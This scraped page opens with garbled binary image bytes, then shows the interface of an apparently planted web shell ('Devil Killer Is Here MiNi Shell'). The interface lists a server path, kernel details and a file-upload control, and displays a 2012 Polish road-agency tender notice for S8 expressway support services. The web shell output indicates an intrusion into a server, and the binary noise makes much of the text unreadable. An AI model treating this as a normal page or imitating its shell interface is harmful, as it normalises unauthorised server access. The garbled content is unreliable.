JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120126/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120126/25548-N-2012.html

<p class="kh_header"><b>Łódź: Wsparcie merytoryczne Wydziału Realizacji
Inwestycji w ramach realizacji inwestycji drogowej budowy drogi ekspresowej S8</b><br>
<b>Numer ogłoszenia: 25548 - 2012; data zamieszczenia: 26.01.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Generalna Dyrekcja Dróg Krajowych i Autostrad Oddział w Łodzi , ul. F.D. Roosevelta 9, 90-056 Łódź, woj. łódzkie, tel. (042) 6622300, faks (042) 6622377, 6622337.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gddkia.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa centralna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wsparcie merytoryczne Wydziału Realizacji
Inwestycji w ramach realizacji inwestycji drogowej budowy drogi ekspresowej S8.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest Wsparcie merytoryczne Wydziału Realizacji Inwestycji w ramach realizacji inwestycji drogowej budowy drogi ekspresowej S8. W ramach zamówienia przewidziano podział na następujące Części - Zadania: Zadanie I -
Monitoring postępu rzeczowo- finansowego realizowanego kontraktu, współpraca z nadzorem autorskim i inwestorskim oraz z inwestorem, prowadzenie wymaganej sprawozdawczości i archiwizacja dokumentów kontraktu, prowadzenie korespondencji związanej z kontraktem, bieżąca kontrola budowy, udział w radach
budowy na budowie drogi ekspresowej S-8 - odcinek 1, 2 i 4. Siedziba Biura Kierownika Projektu Unijnego - Łódź. Zadanie II - Monitoring postępu rzeczowo- finansowego realizowanego kontraktu, współpraca z nadzorem autorskim i inwestorskim oraz z inwestorem, prowadzenie wymaganej sprawozdawczości i archiwizacja dokumentów kontraktu, prowadzenie korespondencji związanej z kontraktem, bieżąca kontrola budowy, udział w radach budowy na budowie drogi ekspresowej S-8 - odcinek 3 i 5. Siedziba Biura Kierownika Projektu Unijnego -
Pabianice. Zadanie III - Monitoring postępu rzeczowo- finansowego realizowanego kontraktu, współpraca z nadzorem autorskim i inwestorskim oraz z inwestorem, prowadzenie wymaganej sprawozdawczości i archiwizacja dokumentów kontraktu, prowadzenie korespondencji związanej z kontraktem, bieżąca kontrola budowy, udział w radach budowy na budowie drogi ekspresowej S-8 - odcinek 9. Siedziba Biura Kierownika Projektu Unijnego - Rzgów- Starowa Góra. Zadanie IV - Monitoring postępu rzeczowo- finansowego realizowanego kontraktu, współpraca z nadzorem autorskim i inwestorskim oraz z inwestorem, prowadzenie wymaganej sprawozdawczości i archiwizacja dokumentów kontraktu, prowadzenie korespondencji związanej z kontraktem, bieżąca kontrola budowy, udział w radach budowy na budowie drogi ekspresowej S-8 - odcinek 9.
Siedziba Biura Kierownika Projektu Unijnego - Rzgów- Starowa Góra. Zadanie V - Monitoring postępu finansowego realizowanego kontraktu, prowadzenie sprawozdawczości i archiwizacja dokumentów kontraktu, prowadzenie korespondencji związanej z kontraktem, rozliczanie pod względem finansowym realizowanych robót, sprawdzanie wystawianych przez wykonawców faktur pod względem poprawności rachunkowej i zgodności z warunkami kontraktu oraz z procedurami unijnymi na budowie drogi ekspresowej S-8 - odcinek 1, 2
i 4. Siedziba Biura Kierownika Projektu Unijnego - Łódź. Zadanie VI- Monitoring postępu finansowego realizowanego kontraktu, prowadzenie sprawozdawczości i archiwizacja dokumentów kontraktu, prowadzenie korespondencji związanej z kontraktem, rozliczanie pod względem finansowym realizowanych robót,
sprawdzanie wystawianych przez wykonawców faktur pod względem poprawności rachunkowej i zgodności z warunkami kontraktu oraz z procedurami unijnymi na budowie drogi ekspresowej S-8 - odcinek 3 i 5. Siedziba Biura Kierownika Projektu Unijnego - Pabianice. Zadanie VII - Monitoring postępu finansowego realizowanego
kontraktu, prowadzenie sprawozdawczości i archiwizacja dokumentów kontraktu, prowadzenie korespondencji związanej z kontraktem, rozliczanie pod względem finansowym realizowanych robót, sprawdzanie wystawianych przez wykonawców faktur pod względem poprawności rachunkowej i zgodności z warunkami kontraktu oraz z procedurami unijnymi na budowie drogi ekspresowej S-8 - odcinek 6, 7 i 8. Siedziba Biura Kierownika Projektu Unijnego - Rzgów- Starowa Góra. Zadanie VIII - Monitoring postępu finansowego realizowanego kontraktu, prowadzenie sprawozdawczości i archiwizacja dokumentów kontraktu, prowadzenie korespondencji związanej z kontraktem, rozliczanie pod względem finansowym realizowanych robót, sprawdzanie wystawianych przez wykonawców faktur pod względem poprawności rachunkowej i zgodności z warunkami kontraktu oraz z
procedurami unijnymi na budowie drogi ekspresowej S-8 - odcinek 6, 7 i 8. Siedziba Biura Kierownika Projektu Unijnego - Rzgów- Starowa Góra. Zadanie IX - Sporządzanie na komputerze wymaganej sprawozdawczości, zestawień i korespondencji, umawianie, obsługa i protokołowanie narad i spotkań organizowanych przez Kierownika Projektu Unijnego, obsługa urządzeń biurowych (telefon, faks, ksero) na budowie drogi ekspresowej S-8 - odcinek 1, 2 i 4. Siedziba Biura Kierownika Projektu Unijnego - Łódź. Wykonawca może złożyć tylko jedną
ofertę na całość zamówienia (wszystkie jego zadania) określonego w niniejszej SIWZ lub na dowolnie wybrane zadanie (zadania) tego zamówienia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt 6 ustawy Pzp, do 50% wartości zamówienia podstawowego</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.53.00.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zmawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania warunków w tym zakresie.
Zamawiający dokona oceny spełniania warunków udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu, o którym mowa w art. 22 ust. 1 ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania warunków w tym zakresie.
Zamawiający dokona oceny spełniania warunków udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu, o którym mowa w art. 22 ust. 1 ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania warunków w tym zakresie.
Zamawiający dokona oceny spełniania warunków udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu, o którym mowa w art. 22 ust. 1 ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wskazać osoby, które będą uczestniczyć w wykonywaniu zamówienia, legitymujące się kwalifikacjami zawodowymi, wykształceniem i doświadczeniem określonymi poniżej.
Wykonawca, wskaże osoby, które spełniają następujące wymagania: 

Zadanie I - 1 osoba: wykształcenie minimum średnie drogowe lub budowlane, umiejętność obsługi komputera w zakresie pakietu Office, ważne prawo jazdy kat. B.

Zadanie II - 1 osoba: wykształcenie minimum średnie drogowe lub budowlane, umiejętność obsługi komputera w zakresie pakietu Office, ważne prawo jazdy kat. B.

Zadanie III - 1 osoba: wykształcenie minimum średnie drogowe lub budowlane, umiejętność obsługi komputera w zakresie pakietu Office, ważne prawo jazdy kat. B.

Zadanie IV - 1 osoba: wykształcenie minimum średnie drogowe lub budowlane, umiejętność obsługi komputera w zakresie pakietu Office, ważne prawo jazdy kat. B.

Zadanie V - 1 osoba: wykształcenie wyższe ekonomiczne, co najmniej 6 miesięczne doświadczenie w zakresie wykonywania rozliczeń finansowych inwestycji, umiejętność obsługi komputera w zakresie pakietu Office.

Zadanie VI - 1 osoba: wykształcenie wyższe ekonomiczne, co najmniej 6 miesięczne doświadczenie w zakresie wykonywania rozliczeń finansowych inwestycji, umiejętność obsługi komputera w zakresie pakietu Office.

Zadanie VII -1 osoba: wykształcenie wyższe ekonomiczne, co najmniej 6 miesięczne doświadczenie w zakresie wykonywania rozliczeń finansowych inwestycji, umiejętność obsługi komputera w zakresie pakietu Office.

Zadanie VIII - 1 osoba: wykształcenie wyższe ekonomiczne, co najmniej 6 miesięczne doświadczenie w zakresie wykonywania rozliczeń finansowych inwestycji, umiejętność obsługi komputera w zakresie pakietu Office.

Zadanie IX - 1 osoba: wykształcenie minimum średnie, biegła obsługa komputera w zakresie pakietu Office, umiejętność obsługi urządzeń biurowych, co najmniej 6 miesięczne doświadczenie w prowadzeniu sekretariatu.


Zamawiający nie dopuszcza wskazania tej samej osoby dla więcej niż jednego części/zadania.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania warunków w tym zakresie.
Zamawiający dokona oceny spełniania warunków udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu, o którym mowa w art. 22 ust. 1 ustawy Pzp.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Na potwierdzenie spełniania warunków, o których mowa w art. 22 ust 1 ustawy Pzp i których opis sposobu oceny spełniania został zamieszczony w pkt. III.3 ogłoszenia należy - pod rygorem wykluczenia z postępowania na podstawie art. 24 ust. 2 pkt 4) ustawy Pzp - złożyć następujące oświadczenia i dokumenty: 
1.1. Oświadczenie o spełnianiu warunków udziału w postępowaniu, o których mowa w art. 22 ust 1 ustawy Pzp. 
1.2. Dokumenty wymienione w pkt. III. 4.1) ogłoszenia. 
2. Wykonawca może polegać na osobach zdolnych do wykonania zamówienia innych podmiotów, niezależnie od charakteru prawnego łączącego go z nimi stosunków. W sytuacji, gdy Wykonawca polega na osobach zdolnych do wykonania zamówienia innych podmiotów, na zasadach określonych w art. 26 ust. 2b ustawy Pzp, zobowiązany jest udowodnić, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne
zobowiązanie tych podmiotów do oddania do dyspozycji Wykonawcy niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. 
3. Jeżeli Wykonawca wykazując spełnienie warunków, o których mowa w
art. 22 ust. 1 ustawy Pzp, polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy Pzp, a podmioty te będą brały udział w realizacji części zamówienia Zamawiający wymaga przedłożenia w odniesieniu do tych podmiotów oświadczenia o braku podstaw do wykluczenia z postępowania w
okolicznościach, o których mowa w art. 24 ust.1 ustawy Pzp. 4. Jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt III.4.3.1) ogłoszenia, zastępuje się je dokumentem zawierającym oświadczenie złożone przed
notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania. 
5. Dokumenty, o których mowa w pkt III.4.3.1), lub zastępujący je dokument, o którym mowa w pkt 4 (powyżej), powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
6. Dokumenty i oświadczenia wymagane dla potwierdzenia spełnienia przez Wykonawców warunków udziału w postępowaniu (za wyjątkiem oświadczenia o spełnieniu warunków w postępowaniu, które musi zostać złożone w formie oryginału, a także zobowiązania, o którym mowa w pkt 2 powyżej, które wymaga
zachowania formy pisemnej) należy złożyć w oryginale lub kopii poświadczonej za zgodność z oryginałem przez Wykonawcę. 
7. W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia oraz w przypadku podmiotów, o których mowa w pkt 2, kopie dokumentów dotyczących odpowiednio wykonawcy lub tych podmiotów są poświadczane za zgodność z oryginałem przez wykonawcę lub te podmioty. Poświadczenie za
zgodność z oryginałem powinno być sporządzone w sposób umożliwiający identyfikację podpisu (np. wraz z imienną pieczątką osoby poświadczającej kopię dokumentu za zgodność z oryginałem). 
8. Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski . 
9. W celu potwierdzenia spełnienia warunków wymaganych od Wykonawców wspólnie ubiegających się o udzielenie zamówienia: 
a) oświadczenie oraz dokumenty wymienione w pkt III.4.2) ogłoszenia albo odpowiadające im dokumenty określone w pkt. III.4.3.1)ogłoszenia oraz w pkt. 4 powyżej, powinny być złożone przez każdego Wykonawcę; 
b) oświadczenie o spełnieniu warunków udziału w postępowaniu, o którym mowa w art. 22 ust. 1 ustawy Pzp, określone w pkt. III.4.1), powinno być złożone w imieniu wszystkich Wykonawców; 
c) dokumenty wymienione w pkt III.4.1) ogłoszenia powinien złożyć dowolny/dowolni Wykonawca/y spośród Wykonawców składających wspólną ofertę.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający przewiduje możliwość zmian Umowy w następujących przypadkach: 
a) zaistnienia siły wyższej, przez którą, na potrzeby niniejszego warunku rozumieć należy zdarzenie zewnętrzne wobec łączącej Strony więzi prawnej: 
- o charakterze niezależnym od Stron, - którego Strony nie mogły przewidzieć przed zawarciem Umowy, 
- którego nie można uniknąć ani któremu Strony nie mogły zapobiec przy zachowaniu należytej staranności, 
- której nie można przypisać drugiej Stronie; 
za siłę wyższą, warunkująca zmianę Umowy uważać się będzie w szczególności: powódź, pożar i inne klęski żywiołowe, zamieszki, strajki, ataki terrorystyczne,
działania wojenne, nagłe załamania warunków atmosferycznych, nagłe przerwy w dostawie energii elektrycznej, promieniowanie lub skażenia; 
b) zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym
wpływ na realizację przedmiotu zamówienia lub świadczenia Stron; 
c) gdy konieczność wprowadzenia zmian będzie następstwem zmian wprowadzonych w Umowie pomiędzy Zamawiającym a Wykonawcą/ami
Kontraktu/ów na budowach; 
2. Wszelkie zmiany niniejszej Umowy wymagają zgody obu Stron w formie pisemnej pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.gddkia.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Generalna Dyrekcja Dróg Krajowych i Autostrad, Oddział w Łodzi Adres: 90-056 Łódź ul. Roosevelta 9.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.02.2012 godzina 11:00, miejsce: Oferty powinny być złożone w Siedzibie Zamawiającego, w Łodzi przy ul. Roosevelta 9 , w pokoju nr 17 (I piętro) - Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Zamówienie jest przewidziane do współfinansowania przy udziale środków pochodzących z Unii Europejskiej z Funduszu Spójności w ramach Pomocy Technicznej Programu Operacyjnego Infrastruktura i Środowisko 
2. Wszelkie oświadczenia, wnioski, zawiadomienia oraz inne informacje Zamawiający oraz Wykonawcy będą przekazywać pisemnie, faksem (nr faksu: 042 66-22-337) oraz drogą elektroniczną za pomocą poczty mailowej (mail: przetargi@lodz.gddkia.gov.pl) z uwzględnieniem pkt. 3. Zamawiający wymaga
niezwłocznego potwierdzenia przez Wykonawcę pisemnie, faksem lub drogą elektroniczną faktu otrzymania każdej informacji przekazanej w innej formie niż pisemna, a na żądanie Wykonawcy potwierdzi fakt otrzymania od niego informacji. 3. Forma pisemna zastrzeżona jest dla złożenia oferty wraz z załącznikami, w tym
oświadczeń i dokumentów potwierdzających spełnianie warunków udziału w postępowaniu, a także zobowiązania, o którym mowa w pkt. III.6) ppkt. 2. oraz oświadczeń i dokumentów potwierdzających spełnianie przez oferowany przedmiot zamówienia wymagań określonych przez Zamawiającego, a także zmiany lub
wycofania oferty. 
4. Zamawiający dopuszcza wykonanie przedmiotu zamówienia przy udziale podwykonawców. Zamawiający żąda wskazania przez Wykonawcę w ofercie (w Formularzu Oferty) zakresu zamówienia (usług), których wykonanie Wykonawca powierzy podwykonawcom.
5. Zamawiający wymaga, aby przedmiot zamówienia był realizowany od dnia podpisania umowy do dnia 31.08.2012r. dla każdej części zamówienia. 
Przewidywany termin realizacji każdej części zamówienia wynosi 6 miesięcy i jest to termin orientacyjny, natomiast data zakończenia realizacji zamówienia jest datą niezmienną..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie I - Monitoring postępu rzeczowo- finansowego realizowanego kontraktu,
współpraca z nadzorem autorskim i inwestorskim oraz z inwestorem, prowadzenie wymaganej sprawozdawczości i archiwizacja dokumentów kontraktu, prowadzenie korespondencji związanej z kontraktem, bieżąca kontrola budowy, udział w radach budowy na budowie drogi ekspresowej S-8 - odcinek 1, 2 i 4. Siedziba Biura Kierownika Projektu Unijnego - Łódź.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie I - Monitoring postępu rzeczowo- finansowego realizowanego kontraktu, współpraca z nadzorem autorskim i inwestorskim oraz z inwestorem, prowadzenie wymaganej sprawozdawczości i archiwizacja dokumentów kontraktu, prowadzenie
korespondencji związanej z kontraktem, bieżąca kontrola budowy, udział w radach budowy na budowie drogi ekspresowej S-8 - odcinek 1, 2 i 4. Siedziba Biura Kierownika Projektu Unijnego - Łódź.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.53.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2012.</p></li>
